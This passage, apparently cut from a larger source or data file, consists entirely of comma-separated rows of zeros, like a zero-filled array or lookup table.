,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
